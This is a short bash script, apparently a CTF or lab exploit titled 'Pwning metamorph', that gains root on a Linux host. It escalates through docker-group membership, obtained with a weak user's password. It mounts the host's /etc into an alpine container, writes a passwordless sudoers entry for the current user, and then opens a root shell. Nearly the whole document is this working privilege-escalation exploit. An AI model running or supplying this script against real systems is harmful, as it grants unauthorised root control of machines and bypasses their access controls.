Pwning metamorph the beautiful way

i-wanna-be-the-root.sh

#!/bin/bash
#
# Copyright (C) 2016 Ayaz BADOURALY
#
# This work is free.  You can redistribute it and/or modify it under the terms of
# the Do What The Fuck You Want To Public License, Version 2, as published by Sam
# Hocevar.  See  the COPYING file  or  http://www.wtfpl.net/  for  more  details.
#
set -e

USERNAME=`whoami`
WEAK_USER="gpa"
WORKDIR="/tmp/$USERNAME.hack"
SCRIPT_NAME="script.sh"
DOCKER_GROUP="docker"
DOCKER_IMAGE="alpine:3.4"

trap clean_up INT


function usage ()
{
        exit 0
}

function set_up ()
{
        echo -n "Building working directory in $WORKDIR... " >&3
        mkdir -p $WORKDIR
        echo "done" >&3
}

function clean_up ()
{
        echo -n "Cleaning temporary files... " >&3
        rm -rf $WORKDIR
        echo "done" >&3
}

function get_docker_privileges ()
{
        echo -n "Gaining docker privileges... " >&3
        if [[ `groups $USERNAME` =~ `printf %s "\b$DOCKER_GROUP\b"` ]] ; then
                echo "already done" >&3
        else
                echo -e "\nEnter $WEAK_USER password below :"
                su $WEAK_USER -c "sudo adduser $USERNAME $DOCKER_GROUP" # >&4 ( probably need reconnection )
        fi
}


set_up
get_docker_privileges

# Setup docker for the hack

docker pull $DOCKER_IMAGE > /dev/null
DOCKER_RUN="docker run --rm -v /etc:/host/etc -v $WORKDIR:/src:ro $DOCKER_IMAGE /src/$SCRIPT_NAME"

# Generate the hacking script

cat > $WORKDIR/$SCRIPT_NAME << EOF
#!/bin/sh

ETC_PATH="/host/etc"

cat > \$ETC_PATH/sudoers.d/$USERNAME << __EOF__
$USERNAME       ALL=(ALL) NOPASSWD:ALL
__EOF__
EOF

chmod +x $WORKDIR/$SCRIPT_NAME

# Run the hack

echo -n "Running the hack... "
eval $DOCKER_RUN
echo "done"

clean_up
docker rmi $DOCKER_IMAGE > /dev/null

echo -e "\nThis is a root shell :"
sudo su